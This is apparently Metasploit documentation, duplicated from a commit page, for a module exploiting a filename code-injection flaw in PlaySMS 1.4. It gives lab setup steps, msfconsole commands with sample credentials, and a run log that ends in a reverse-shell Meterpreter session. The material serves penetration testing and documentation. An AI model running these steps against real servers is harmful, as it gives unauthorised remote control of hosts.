documentation/modules/exploit/multi/http/playsms_filename_exec.md

## Description
This module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB [42044](https://www.exploit-db.com/exploits/42003/).

## Vulnerable Application 
Available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz)

### Vulnerable Application Installation Setup.
 1. Download Application : `wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
 2. Extract : `tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
 3. Move In WebDirectory : `mv playsms-1.4/web/* /var/www/html/`
 4. make config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
 5. Change Owner : `chown -R www-data:www-data /var/www/html/`
 6. Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.
 7. Now Visit : http://localhost/

## Verification Steps

 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/multi/http/playsms_filename_exec`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi SecreTSMSgatwayLogin`
 7. Do: `set username touhid`
 8. Do: `set password diana`
 9. Do: `check`
```
[*] 10.22.1.10:80 The target appears to be vulnerable.
```
 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `exploit`
 13. You should get a shell.


## Scenarios
### Playsms on Ubuntu Linux
```
msf exploit(multi/http/playsms_filename_exec) > run                                                                                    
                                                                                                                                       
[*] Started reverse TCP handler on 10.22.1.3:4444                                                                                      
[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2                                                                          
[*] Trying to Login ......                                                                                                             
[+] Authentication successful : [ touhid:diana ]                                                                                       
[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc                                                                         
[*] Trying to upload file with malicious Filename Field....                                                                            
[*] Sending stage (37775 bytes) to 10.22.1.15                                                                                          
[*] Sleeping before handling stage...                                                                                                  
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530                                     
                                                                                                                                       
meterpreter >
```
Land #9944 , playsms_filename_exec.rb 2018-05-07 07:43:16 -05:00			`## Description`
			`This module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB [42044](https://www.exploit-db.com/exploits/42003/).`

			`## Vulnerable Application`
			`Available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz)`

			`### Vulnerable Application Installation Setup.`
			1. Download Application : `wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
			2. Extract : `tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
			3. Move In WebDirectory : `mv playsms-1.4/web/* /var/www/html/`
			4. make config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
			5. Change Owner : `chown -R www-data:www-data /var/www/html/`
			`6. Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.`
			`7. Now Visit : http://localhost/`

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: `use exploit/multi/http/playsms_filename_exec`
			4. Do: `set rport <port>`
			5. Do: `set rhost <ip>`
			6. Do: `set targeturi SecreTSMSgatwayLogin`
			7. Do: `set username touhid`
			8. Do: `set password diana`
			9. Do: `check`
			```
			`[*] 10.22.1.10:80 The target appears to be vulnerable.`
			```
			10. Do: `set lport <port>`
			11. Do: `set lhost <ip>`
			12. Do: `exploit`
			`13. You should get a shell.`


			`## Scenarios`
			`### Playsms on Ubuntu Linux`
			```
			`msf exploit(multi/http/playsms_filename_exec) > run`

			`[*] Started reverse TCP handler on 10.22.1.3:4444`
			`[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2`
			`[*] Trying to Login ......`
			`[+] Authentication successful : [ touhid:diana ]`
			`[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc`
			`[*] Trying to upload file with malicious Filename Field....`
			`[*] Sending stage (37775 bytes) to 10.22.1.15`
			`[*] Sleeping before handling stage...`
			`[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530`

			`meterpreter >`
			```